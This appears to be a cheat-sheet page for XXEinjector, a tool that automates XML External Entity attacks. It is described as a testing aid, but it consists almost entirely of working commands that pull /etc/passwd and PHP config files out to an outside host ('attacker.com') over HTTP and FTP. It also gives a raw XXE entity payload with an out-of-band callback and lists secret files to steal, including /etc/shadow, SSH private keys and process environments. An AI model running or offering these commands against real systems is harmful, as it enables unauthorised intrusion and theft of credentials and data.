Description
XXEinjector automates XXE (XML External Entity) exploitation. It supports direct and out-of-band (OOB) data exfiltration via HTTP and FTP protocols. Critical for testing XML-based APIs and file upload endpoints.
Installation
BASH
git clone https://github.com/enjoiz/XXEinjector.git
cd XXEinjector
# Requires Ruby
ruby XXEinjector.rb --helpBasic Usage
BASH
# Basic file extraction
ruby XXEinjector.rb --host=attacker.com --file=/etc/passwd --path=/target/endpoint --httpport=8080
# With authentication
ruby XXEinjector.rb --host=attacker.com --file=/etc/passwd \
--path=/target/endpoint --header="Cookie: session=abc"Advanced Usage
BASH
# OOB via FTP
ruby XXEinjector.rb --host=attacker.com --file=/etc/passwd \
--path=/target/endpoint --oob=ftp --ftpport=2121
# Enumerate directories
ruby XXEinjector.rb --host=attacker.com --path=/target/endpoint \
--file=/etc/ --enumports=80 --oob=http
# CDATA extraction (for special characters)
ruby XXEinjector.rb --host=attacker.com --file=/etc/passwd \
--path=/target/endpoint --cdata
# PHP filter wrapper
ruby XXEinjector.rb --host=attacker.com \
--file=php://filter/convert.base64-encode/resource=/var/www/html/config.php \
--path=/target/endpoint --oob=http
# HTTPS target
ruby XXEinjector.rb --host=attacker.com --file=/etc/passwd \
--path=/target/endpoint --sslCommon Workflows
BASH
# Step 1: Test for XXE
# Inject in Content-Type: application/xml
# <!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://callback.oast.fun/xxe">]>
# <root>&xxe;</root>
# Step 2: If OOB callback received, use XXEinjector for data exfil
ruby XXEinjector.rb --host=attacker.com --file=/etc/passwd \
--path=https://target.com/api/parse --oob=http --httpport=8080
# Step 3: Read sensitive files
# /etc/passwd, /etc/shadow, ~/.ssh/id_rsa, /proc/self/environ